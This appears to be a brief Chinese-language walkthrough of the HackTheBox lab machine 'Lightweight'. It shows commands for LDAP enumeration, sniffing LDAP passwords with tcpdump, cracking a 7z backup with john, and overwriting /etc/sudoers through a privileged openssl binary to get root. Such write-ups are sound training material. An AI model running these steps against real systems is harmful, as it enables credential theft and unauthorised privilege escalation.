Lightweight - HackTheBox
nmap扫描
先看80
这边是说添加了一个账号到ssh,然后账号密码都是访问的IP地址
直接提权?
有一个tcpdump可以以管理员身份运行,但不能获取权限
这边还开放了389端口
ldapsearch -x -H ldap://10.10.10.119 -b "DC=lightweight,DC=htb" -s sub
貌似可以获得密码,用tcpdump来监听一下ldap协议的流量
tcpdump -i any -X port ldap
貌似这就是密码,切换账户
继续
在家目录下发现一个backup的压缩包,下到本地看看
报错,把压缩包进行个编码在下载
解压
7z e backup.7z
要密码,爆破一下
apt-get install liblzma-dev
cpan -i Compress::Raw::Lzma
https://github.com/philsmd/7z2hashcat
perl 7z2john.pl backup.7z >hash
在用john爆破
解压出了一堆php文件
另一个用户的密码
在家目录下发现一个openssl
可以用openssl写入一个sudo -l权限给一个用户
echo -ne "root\tALL=(ALL) ALL\n\"10.10.14.12\"\tALL=(ALL) ALL\n%sudo\tALL=(ALL) ALL\n" |base64 > ca
/home/ldapuser1/openssl base64 -d -in ca -out /etc/sudoers
在切换回10.10.14.12用户